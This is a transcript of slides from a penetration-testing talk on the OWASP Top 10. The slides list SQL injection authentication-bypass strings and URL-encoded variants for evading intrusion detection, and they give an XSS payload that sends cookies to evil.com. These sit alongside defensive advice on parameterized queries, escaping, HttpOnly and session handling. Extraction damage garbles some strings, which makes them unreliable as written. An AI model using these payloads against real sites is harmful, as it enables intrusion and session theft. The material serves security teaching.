Reliable and fast security audits - The modern and offensive way-Mohan Gandhi

https://entersoft.co.in

Entersoft Information Systems Pvt Ltd


•  Introduction to web application penetration testing –  How and why? –  Automated tools demo

•  Open Web Application Security Project (OWASP) –  Introduction

•  Top 10 Security Vulnerabilities –  Injections and cheat codes

•  Filter Evasion


Web is a platform of collaboration, a place where users can share, can interact and can build up on the work of their own as well as that of others’…Blah Blah Blah Blah Blah…… No, it’s a Dangerous place!


•  Demo


Injection

Broken Authentication & Session Management

Cross-‐‑Site Scripting

Insecure Direct Object References

Security Misconfigurat

ion

Unvalidated Redirects and Forwards

Missing Function Level Access Control

Cross-‐‑Site Request Forgery

Using Components with Known Vulnerabilities

Unvalidated Redirects and Forwards


Used when your app sends user-‐‑supplied data to other apps Database, Operating System, LDAP, Web Services

Hackers "ʺinject"ʺ their code to run instead of yours To access unauthorized data, or completely take over remote application

§ Code expects a nice parameter in the URL •  http://example.com/user/login.php The above url expects username & Password like statement = "ʺSELECT * FROM users WHERE name ='ʹ"ʺ + userName + "ʺ'ʹ;“ +Password+”;”

Hacker could instead supply Statement = “SELECT * FROM users WHERE name = 'ʹ'ʹ OR 'ʹ1'ʹ='ʹ1'ʹ -‐‑-‐‑ 'ʹ;”


Don’t: name your child SELECT * FROM userinfo WHERE id=Robert;DROP TABLE

users; Do: expect SQL Injection


You can try all the combinations for string “or a=a” that we have tried for “or 1=1”….. Lke #,–, /* etc…

or 1=1

‘or 1=1

“or 1=1

or 1=1–

‘or 1=1–

“or 1=1–

or 1=1#

‘or 1=1#

“or

1=1#

or 1=1/*

‘or 1=1/*

“or 1=1/*

or 1=1;%00

‘or 1=1;%00

“or 1=1;%00

‘or’

‘or

‘or’–

‘or–

or a=a

‘or a=a

“or a=a

or a=a–

‘or a=a –

“or a=a–

or ‘a’=’a’

‘or ‘a’=’a’

“or ‘a’=’a’

‘)or(‘a’=’a’

“)”a”=”a”

‘)’a’=’a

‘or’’=’


•  Demo


hap://[site]/page.asp?id=2 or 2=2-‐‑-‐‑ (Instead of 1=1 u can use 2=2) hap://[site]/page.asp?id=2 or 1<2– hap://[site]/page.asp?id=2 or 1 like 1– (instead of “=“ we use like) hap://[site]/page.asp?id=2 /**/or /**/2/**/=/**/2-‐‑-‐‑ (comments)

Ids ‘s easily detect -‐‑-‐‑,<,>= so we can encode and try hap://[site]/page.asp?id=2 or 2%3B2%2D%2D hap://[site]/page.asp?id=2 or 1%3C2%2D%2D hap://[site]/page.asp?id=2 or 1 like 1%2D%2D hap://[site]/page.asp?id=2 /**/or /**/2/**/=/**/2%2D%2D


• "ʺConnections"ʺ between systems are highly vulnerable

• Always assume data coming in could be "ʺevil"ʺ • be sure to include "ʺevil"ʺ use cases and user stories in your design

• Ideally, only allow the user to select among "ʺsafe"ʺ options • no generic text allowed

• If user-‐‑input text is needed, use parameterized queries • clean up quotes, parenthesis, and SQL comments

• Use a baale-‐‑tested library for protecting your database • Java PreparedStatement, OWASP'ʹs ESAPI codecs


Sites must "ʺcleanse"ʺ user input before displaying it Hackers can create URLs to inject their own HTML onto the page

can be used to do almost any kind of aaack!!!

Example: JSP to draw HTML based on user input String html = "ʺ<input name='ʹitem'ʹ type='ʹTEXT'ʹ value='ʹ"ʺ + request.getParameter("ʺitem"ʺ) + "ʺ'ʹ>"ʺ;

Code expects a nice URL: hap://example.com/search.php?q=word

But a hacker could supply this: hap://example.com/search.php?q='ʹ><script>document.location='ʹhap://evil.com/steal/'ʹ+document.cookie</script>

Then, try to trick somebody to go to that URL Stolen cookies are frequently as good as stole passwords


Never, ever, ever trust user-‐‑submiaed content! URLs, comments threads, web forms

Properly "ʺescape"ʺ any data before displaying it on web pages JavaScript parameters, URL parameters, STYLE elements Remove script tags, and possibly anything with a SRC aaribute Use ESAPI to "ʺcleanse"ʺ your HTML

Do not allow state-‐‑change from HTTP GET requests Otherwise, an IMG tag could cause you to lose all your data

Set the HapOnly flag in your response headers Prevents document.cookie from working in JavaScript


Assume my user id is 238

I see a link on “My Projects” page that goes here: hap://example.com/users/view.php?userid=238

If I alter the URL, can I see other people’s projects? hap://example.com/users/view.php?userid=235

Do you only restrict access in the web form?

What if I could "ʺguess"ʺ the URL? Could I see the page? Don'ʹt trick yourself into thinking complex URLs are any more secure Security != Obscurity


Every resource needs a security level What roles do you need to access certain items? Access Control Lists are easy to implement, but don’t always scale

All access to that resource should go through the same check What action are you taking, with what resource? Put it all in one common codebase for simplicity May need to run check multiple times, for sub-‐‑actions and sub-‐‑resources Unusual behavior? Have additional authentication questions/layers!

Front-‐‑end restriction is nice for usability, but not security

Back-‐‑end application must double-‐‑check access rights


HTTP is a "ʺstateless"ʺ protocol Nice and simple: HTTP request, HTTP response All data must be passed in the request every time

How do we store state? Client side with cookies Server side with sessions

Most apps place a "ʺsessionId"ʺ in cookies, or in the URL Problem: now stealing sessionIds is just as good as stealing passwords!

Multiple ways to determine a session ID packet sniffing -‐‑-‐‑ especially on an open WiFi access point or LAN HapReferrer logs, if sessionId is in the URL


Assume that a user stole a session ID Determine how bad this would be in your application

Use SSL everywhere! Makes it harder for people to “sniff” your session ID

If you cannot use SSL everywhere, use it for logins Have a cryptographically strong session ID

Good sessionIds should be very difficult to re-‐‑use Embed user IP address, user name, timestamp, and a secret Forces an aaacker to spoof IP addresses to take over Prompt for re-‐‑login if IP changes during a session


?


[email protected]

Ph: +91-40 65810005

https://entersoft.co.in/contact

Reliable and fast security audits - The modern and offensive way-Mohan Gandhi

Technology

Transcript of Reliable and fast security audits - The modern and offensive way-Mohan Gandhi